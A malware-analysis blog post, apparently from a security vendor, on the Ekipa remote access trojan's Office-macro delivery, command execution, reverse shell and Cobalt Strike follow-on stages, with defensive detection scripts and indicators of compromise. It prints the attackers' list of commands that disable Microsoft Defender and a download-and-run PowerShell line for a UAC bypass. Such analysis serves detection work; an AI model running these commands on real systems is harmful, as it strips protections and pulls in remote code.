Malicious Macros Adapt to Use Microsoft Publisher to Push Ekipa RAT

After Microsoft announced this year that macros from the Internet will be blocked by default in Office, many threat actors have switched to different file types such as Windows Shortcut (LNK), ISO or ZIP files, to distribute their malware. Nevertheless, Office documents are still actively leveraged in many campaigns and pose a large risk to organizations, especially with threat actors continuously finding new ways to avoid detection.

The Trustwave SpiderLabs Research Team has analyzed samples of the Ekipa Remote Access Trojan (RAT) in the wild and found interesting techniques in its use of malicious Office documents. As shown in this research, the Ekipa RAT was added to a sophisticated threat actor’s cyber arsenal and used in the Russia-Ukraine war.

Overview of Functionalities

Ekipa is a Remote Access Trojan used for targeted attacks and can be purchased on underground forums, as CloudSEK found in its research. The current price is set at $3,900, which is very high. The trojan leverages MS Office and Visual Basic for Applications as its main infection and operations vector. It also comes with a control panel and builders for:

  • MS Word Macros
  • XLL Excel add-ins
  • MS Publisher Macros

The Ekipa RAT is capable of:

  • Collecting information about a targeted system (basic system information, installed AV products, GPU and CPU information and more)
  • Browsing and downloading of files on attached drives
  • Dropping files
  • Executing files and commands.

When used with malicious Word documents, the trojan’s main functions are implemented in a one-time VBA macro template. When the document is reopened, the server rejects the request to download the macro template and all subsequent requests for installation actions.


Figure 1 Ekipa RAT advertisement on the XSS forum



Figure 2: Ekipa RAT is continuously updated with new features, as seen in the presented screenshot from the XSS forum.


Analysis of Microsoft Word Documents with Remote Template

There are multiple documents related to Ekipa RAT on popular malware analysis sites, but since the Command and Control (C2) server rejects subsequent requests for the remote template, only a few templates are available for analysis. Malwarebytes analyzed an early version of the template in July 2021, and a few samples were discovered by other researchers and posted on Twitter. The comprehensive list of samples identified by Trustwave is presented in the IOC section of this blog. In the following paragraphs we analyze the Microsoft Word remote templates:

  • 4ee626e058e7be9e5d20f314895500c5abf34c61a15a3b9b4f90c04f88c26aad
  • E5a302c3d53851be4e09585f7462346a6f7a71b02bf38d8483f5c48e2ab845c7



The initial Microsoft Word document “Приказ №21 от 29-03-2022.docx” was observed in March 2022. Upon execution, it downloads the remote template from the URL:


This URL pattern matches URLs seen in other documents related to Ekipa RAT. They contact the ‘t.php’ endpoint with the parameter "t", a unique identifier ensuring that the remote template can be fetched only once for any given initial Word document, and the parameter “action” with the value “show_document”.
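A defender-side check for this delivery stage is to look inside incoming .docx files for an external attached template and compare its URL against the pattern just described. The following Python script is an added example written for this post, not Trustwave's or the RAT author's code: it reads the attachedTemplate relationship from word/_rels/settings.xml.rels, extracts any external target, and flags targets that match the t.php / t / action=show_document shape. The sample document it builds, and the hostname and parameter values inside it, are constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlparse
from xml.sax.saxutils import escape

# OOXML namespace and relationship type for an attached (remote) template
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def remote_templates(docx_bytes):
    """Return external attachedTemplate targets declared in the document.

    A benign document normally has no external template target at all, so
    any hit is worth a look even before the URL heuristic below runs.
    """
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return targets
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
        for rel in root.findall(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == ATTACHED_TEMPLATE
                    and rel.get("TargetMode") == "External"):
                targets.append(rel.get("Target"))
    return targets


def looks_like_ekipa_url(url):
    """Heuristic based on the pattern described in the post:
    a t.php endpoint carrying a 't' token and action=show_document."""
    parsed = urlparse(url)
    if not parsed.path.lower().endswith("/t.php"):
        return False
    query = parse_qs(parsed.query)
    return "t" in query and query.get("action") == ["show_document"]


def scan(docx_bytes):
    """Pair every external template target with the heuristic verdict."""
    return [(url, looks_like_ekipa_url(url)) for url in remote_templates(docx_bytes)]


def build_sample_docx(template_url=None):
    """Constructed minimal .docx containing only the parts the scanner reads.
    With template_url=None no settings relationship part is written at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/settings.xml", "<settings/>")
        if template_url is not None:
            # escape() turns '&' into '&amp;' so the XML stays well-formed
            zf.writestr(
                "word/_rels/settings.xml.rels",
                f'<Relationships xmlns="{REL_NS}">'
                f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                f'Target="{escape(template_url)}" TargetMode="External"/>'
                "</Relationships>",
            )
    return buf.getvalue()


# Constructed URLs: the first mimics the shape described in the post, the
# second is an ordinary corporate template reference.
SUSPICIOUS_URL = "http://c2.example/t.php?t=0123456789abcdef&action=show_document&x=2500"
BENIGN_URL = "http://intranet.example/templates/letterhead.dotx"

if __name__ == "__main__":
    for url, flagged in scan(build_sample_docx(SUSPICIOUS_URL)):
        print(f"{'SUSPECT' if flagged else 'review '} {url}")
```

The 'x' parameter in the constructed URL stands in for the timer interval the post mentions later; its value here is an assumption, not one taken from a sample. In practice the scan would run on mail-gateway attachments, and any external template target, flagged or not, deserves review because legitimate documents rarely carry one.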

The remote template executes the VBA RAT after the user decides to close the document. In the DocumentBeforeClose procedure, it cancels shutdown of the document and instead sets the Application.Visible property to False. Then it executes the main ConnectCP function.


Figure 3: DocumentBeforeClose procedure in analyzed template

Main Functionalities

In the ConnectCP routine, the malicious macro collects information about the system and stores it in a JSON format. Next, it leverages SetTimer to set up a procedure (“TimerProc”) that will execute every 2.5 seconds. The time interval value is the ‘x’ parameter in the initial URL fetching the remote template.

The timer procedure executes the function responsible for sending the initially collected data about the system to the Command-and-Control server. In response the server returns a list of tasks for the trojan to execute.



Figure 4: System information collection and exfiltration.


The RAT has nine different tasks that it can execute. These are similar to what Malwarebytes observed in its research, except that the shellcode execution feature is missing. An interesting technique used to implement the execution of a command is described in the following section.

The tasks listed in Figure 5 are:

  • Set different timer procedure execution interval
  • Enumerate drives
  • Enumerate files and directories
  • Exfiltrate files or directories
  • Download file
  • Not implemented
  • Delete file
  • Copy file
  • Execute command

Figure 5: Tasks implemented in the VBA RAT


Commands Execution via SendInput

One of the analyzed malware capabilities is the execution of commands provided by the Command-and-Control server. For that purpose, the threat actors use a technique leveraging the SendInput function from USER32.DLL.


Figure 6: Beautified VBA code executing commands leveraging SendInput function.

The malicious VBA macro synthesizes keyboard input to open the ‘Run’ window and execute malicious commands. This way it evades detection based on parent-child process relationships. As shown in the example below, running cmd.exe with this technique (console titled ‘CMDSendInput’) opens a new console window with explorer.exe as the parent process, whereas the cmd.exe started via the classic Visual Basic “Call” and “Shell” functions (console titled “CMDCallShell”) has winword.exe as its parent.


Figure 7: Example Run Window Starting Command Prompt



Figure 8: Process tree with executed Command Prompts



This is significant as the Parent-Child process relationships are often the basis for detection of malicious activity by security products.


Based on Creation Date analysis, this template is a later version of Ekipa RAT. According to this timestamp it was created on August 7, 2022, but it was observed in the wild around December 12, 2022. Multiple documents fetching this remote template were submitted to VirusTotal, suggesting a wider campaign. All used a lure targeting Russian recipients.



Figure 9: Lure used in document OPRF.docx

URLs fetching the remote template share the same pattern as with other C2 servers. Here is an example of the link:


Functionalities of the VBA RAT in the remote template are similar to those in an earlier version analyzed in previous paragraphs. Notably, there is a new task that can be executed by the RAT which is a reverse shell. More detail on Reverse Shell Creation is presented in the next section.

Reverse Shell Creation

A new task with Task ID ‘~’ is responsible for creating a reverse shell for the attacker. It creates a ‘cmd.exe’ process with a modified STARTUPINFOA structure so that standard input and output are routed through two created pipes. One of them is used to send commands to the Command Prompt and the second one to read the output.


Figure 10: Reverse Shell Creation implementation of Ekipa RAT


Use of Ekipa RAT In The Wild

The most recent Ekipa RAT Command and Control server identified by SpiderLabs is domain ekb[.]tanzedrom[.]ru. This C2 server quickly became inactive, and we were unable to interact with it. However, during our research we were able to communicate with the other identified C2 server, domain azure-tech[.]pro.

The server did not respond to requests fetching the remote template, but after analysis of the template observed in earlier infections and described in the previous section, we were able to interact with the server and acquire a list of tasks that were supposed to execute on an infected machine. What’s interesting is that the C2 server appeared to be geo-fenced to only allow traffic from Ukraine. Fetched tasks included the download of second stage payloads from another server and execution of two files.


Figure 11: Infection flow of a sample communicating with one of the analyzed C2 servers.

The second-stage server, 146.70.87[.]218, was not active at the time of the analysis; however, by pivoting on this IP address and URL pattern we found additional IP addresses that we assess with high confidence to be part of the same malicious infrastructure.


Figure 12: Identified malicious infrastructure and its similarities

Security researcher @1LuminateTheNet shared a directory listing of 146.70.87[.]148 on Twitter. We found similar batch scripts on the active server 185.246.220[.]149.


Figure 13: Directory Listing identified on one of the servers.

All batch scripts share similar patterns. Each {FILENAME}.bat is an encoded PowerShell command; an example is presented in Figure 14.


Figure 14: Example encoded PowerShell command.

The decoded command consists of two parts:

  1. An obfuscated AMSI bypass one-liner
  2. Execution of commands fetched from the /load/{FILENAME} URI


Figure 15: Example decoded powerDEF.bat script.


Analysis of powerDEF.bat

Script powerDEF.bat executes the list of commands tampering with Microsoft Defender settings presented in Figure 16.

Add-MpPreference -ExclusionExtension ".bat"
Add-MpPreference -ExclusionExtension ".exe"
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8
Set-MpPreference -MAPSReporting 0
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8

Figure 16: List of commands tampering with Microsoft Defender settings.
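Every line in Figure 16 is a Set-MpPreference or Add-MpPreference call, which makes the script a good fit for a simple content-based detection over PowerShell script block logs (Event ID 4104) or EDR command-line telemetry. The following Python script is an added example written for this post, not Trustwave's tooling: it parses each cmdlet invocation, and reports switches that turn a protection off, parameters set to their weakest documented value, and exclusions being added. The mapping of values to meaning (for example MAPSReporting 0 = Disabled, SubmitSamplesConsent 2 = NeverSend, ScanScheduleDay 8 = Never, *ThreatDefaultAction 6 = Allow) is the author's reading of the Defender cmdlet documentation; the POWERDEF_SAMPLE text reproduces the Figure 16 commands and BENIGN_SAMPLE is constructed.

```python
import re

# Set-MpPreference switches that disable a protection when set to $true
DISABLING_SWITCHES = {
    "disablerealtimemonitoring", "disablebehaviormonitoring",
    "disableblockatfirstseen", "disableioavprotection",
    "disablescriptscanning", "disableintrusionpreventionsystem",
    "disablearchivescanning", "disableprivacymode",
    "signaturedisableupdateonstartupwithoutengine",
}

# Value-bearing parameters and the (lowercased) values that weaken Defender,
# per the documented enumerations: 0 = Disabled, 2 = NeverSend, 8 = Never, 6 = Allow
RISKY_VALUES = {
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "puaprotection": {"disable", "disabled", "0"},
    "submitsamplesconsent": {"2"},
    "mapsreporting": {"0"},
    "scanscheduleday": {"8"},
    "highthreatdefaultaction": {"6"},
    "moderatethreatdefaultaction": {"6"},
    "lowthreatdefaultaction": {"6"},
    "severethreatdefaultaction": {"6"},
}

EXCLUSION_PARAMS = {"exclusionextension", "exclusionpath", "exclusionprocess"}

CMDLET_RE = re.compile(r"^\s*(Set|Add)-MpPreference\b(.*)$", re.IGNORECASE)
# a parameter name, optionally followed by one quoted or bare value
PARAM_RE = re.compile(r'-(\w+)(?:\s+("[^"]*"|\$?[\w.]+))?')


def classify(cmdlet, name, value):
    """Return a human-readable reason if this parameter weakens Defender."""
    key = name.lower()
    val = (value or "").strip('"\'').lower()
    if cmdlet == "add-mppreference" and key in EXCLUSION_PARAMS:
        return f"exclusion added: {name} {value}"
    if key in DISABLING_SWITCHES and val == "$true":
        return f"protection switched off: {name}"
    if key in RISKY_VALUES and val in RISKY_VALUES[key]:
        return f"setting weakened: {name} {value}"
    return None


def analyze_script(text):
    """Scan script text line by line; return (line_no, cmdlet, reason) findings."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = CMDLET_RE.match(line)
        if not match:
            continue
        cmdlet = f"{match.group(1)}-MpPreference".lower()
        for pm in PARAM_RE.finditer(match.group(2)):
            reason = classify(cmdlet, pm.group(1), pm.group(2))
            if reason:
                findings.append((line_no, cmdlet, reason))
    return findings


# Commands reproduced from Figure 16 of the post (powerDEF.bat)
POWERDEF_SAMPLE = """Add-MpPreference -ExclusionExtension ".bat"
Add-MpPreference -ExclusionExtension ".exe"
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8
Set-MpPreference -MAPSReporting 0
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8
"""

# Constructed administrative lines that should produce no findings
BENIGN_SAMPLE = """Get-MpPreference
Set-MpPreference -DisableRealtimeMonitoring $false
Set-MpPreference -ScanScheduleDay 1
Set-MpPreference -MAPSReporting 2
"""

if __name__ == "__main__":
    for line_no, cmdlet, reason in analyze_script(POWERDEF_SAMPLE):
        print(f"line {line_no:2d} {cmdlet}: {reason}")
```

A single weakened setting can be legitimate administration; the useful signal is the density of findings from one script or one process in a short window, which is why the function returns every hit rather than a yes/no verdict.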


Analysis of uac.bat

Script uac.bat executes 1.bat script leveraging User Account Control Bypass from GitHub: 

iex(new-object net.webclient).downloadstring('')UACBypass -noninteractive -command "C:\windows\system32\1.bat" -technique DiskCleanup


Analysis of 1.bat, 2.bat and 4.bat

Script 1.bat downloads and executes payload from http[:]//185.246.220[.]149:10443/work6, which is a PowerShell Cobalt Strike Beacon loader.



Figure 17: Example PowerShell Cobalt Strike Beacon loader


Configuration of the Beacon can be extracted using one of the scripts available on GitHub.



Figure 18: Cobalt Strike configuration extracted from one of the Beacons

Scripts 2.bat and 4.bat work analogously to 1.bat; they differ only in the URL used to fetch the Beacon PowerShell loader and in the Cobalt Strike Team Server IP address in the configuration.



All Cobalt Strike configurations shared the same watermark (206546002), which Trend Micro researchers tied to the Play and Quantum ransomware groups. Cobalt Strike beacons with this watermark were dropped by the Emotet and SVCReady botnets.

The Ekipa RAT is also being used in the Russia-Ukraine conflict. While the analyzed Command and Control server azure-tech[.]pro seemed to be geo-fenced to only allow traffic from Ukraine, other documents were used in attacks against Russia. Documents communicating with the kc-3[.]ru and roskazna[.]net domains used lures targeting Russian recipients.



Figure 19: Lure used in document “Приказ №21 от 29-03-2022.docx” impersonating Federal Treasury of Russia


The Institute of Natural and Technical Systems is a Russian entity sanctioned by the Ukrainian government. In one of its publications, called “List of measures to improve the security of the organization's IT infrastructure from the Ministry of Education and Science” (translation by Trustwave), it mentions the roskazna[.]net domain and a document with the same filename as presented above, and attributes it to the campaign against the Russian Federation.



Figure 20: Part of the article published by Institute of Natural and Technical Systems


Trustwave identified two emails, with the aforementioned document as a malicious attachment, targeting major governmental and financial institutions in the Russian Federation. The first email was addressed to the Federal Customs Service of Russia; the second was addressed to one of the departments of Gazprom, the main Russian natural resources extractor.



Figure 21: Emails with malicious attachment targeting the Federal Customs Service of Russia and Gazprom Russia


As shown in this research, the Ekipa RAT is actively being used to target Russian entities and individuals, which is in line with the Malwarebytes research.

Given that one of the servers appeared to be geofenced to only allow traffic from Ukraine, there is a small chance that it was used by two sides of this conflict.

It is interesting that while being sold on pro-Russian forums, Ekipa RAT is leveraged to target entities in Russia, which breaks the unwritten rule of this country’s hacker underground – don’t hack Russia.


Microsoft Publisher and XLL variants of Ekipa RAT

We did not identify samples of these Ekipa RAT variants in the wild. The IOC section includes one Excel document with embedded macros that, based on the included URL pattern, is an Ekipa RAT loader; however, the C2 server was inactive during our analysis.

Both the XLL Excel add-in and Publisher variants are most likely a response to Microsoft blocking macros in files downloaded from the Internet. While XLL files are widely used by threat actors, Microsoft Publisher (.pub) files are a niche.

Just as with other Microsoft Office products, like Excel or Word, Publisher files can contain macros that execute upon opening or closing the file, which makes them interesting initial attack vectors from the threat actor’s point of view. When Microsoft blocked macros from executing in files downloaded from the Internet, it did not do so for Publisher files.

Figure 22: Part of Microsoft’s documentation at


The user is presented with the warning but is still one click away from executing the malicious file and possibly infecting a machine. So far, Trustwave has not observed an uptick in malicious Publisher email attachments. Nevertheless, Trustwave SpiderLabs is monitoring the situation.



Figure 23: Security Notice displayed when user tries to run Publisher file with Macros downloaded from the internet



The Ekipa RAT is a great example of how threat actors continuously change their techniques to stay ahead of defenders. As shown in this research, the creators of this malware are tracking changes in the security industry, like Microsoft blocking macros from the Internet, and shifting their tactics accordingly. It is also interesting to see how sophisticated threat actors adopt these new tools into their arsenal for a better chance of completing their objectives.

Trustwave SpiderLabs would like to thank the team members who contributed supplemental findings in support of this blog.



Initial Microsoft Word Documents

Initial Document | C2 Domain


Microsoft Word Remote Templates


Initial Microsoft Excel Document

Initial Document | C2 Domain

In the Wild Use

146[.]70[.]87[.]218 | IP address hosting 2nd stage payloads
hxxp://146[.]70[.]87[.]218/load/6.bat | 2nd stage batch script observed in Ekipa RAT campaign
hxxp://146[.]70[.]87[.]218/load/doc.dll | 2nd stage DLL observed in Ekipa RAT campaign
hxxp://193[.]47[.]61[.]182/load/powerDEF.bat | 9f8b39480505b822c0a34f60f0604a68 | Batch script tampering with Defender settings
hxxp://193[.]47[.]61[.]182/load/uac.bat | 1c25e329b603f8b8088d7f291c308b39 | Batch script with UAC bypass
hxxp://193[.]47[.]61[.]182/load/1.bat | e322156d6b142647e61f22c6929a2c08 | Batch scripts leading to Cobalt Strike beacon installation
hxxp://193[.]47[.]61[.]182/load/2.bat | 50433cf9c4fe37db367e9741b36b58d8 | Batch scripts leading to Cobalt Strike beacon installation
hxxp://193[.]47[.]61[.]182/load/4.bat | c236ba55a7e3513fd59d39c75356a52f | Batch scripts leading to Cobalt Strike beacon installation
hxxp://185[.]246[.]220[.]149:10443/work6 | 4ad293fe645ca18db71273771418f440 | PowerShell Cobalt Strike beacon loader
hxxp://185[.]246[.]220[.]148:10443/work5 | 45246a95de6022d3bd254f4e8f460436 | PowerShell Cobalt Strike beacon loader
hxxp://85[.]208[.]136[.]130:80/work2 | 4896024921a0b23d84f75e845452759d | PowerShell Cobalt Strike beacon loader
185[.]246[.]220[.]149 | Cobalt Strike team server
206546002 | Cobalt Strike watermark

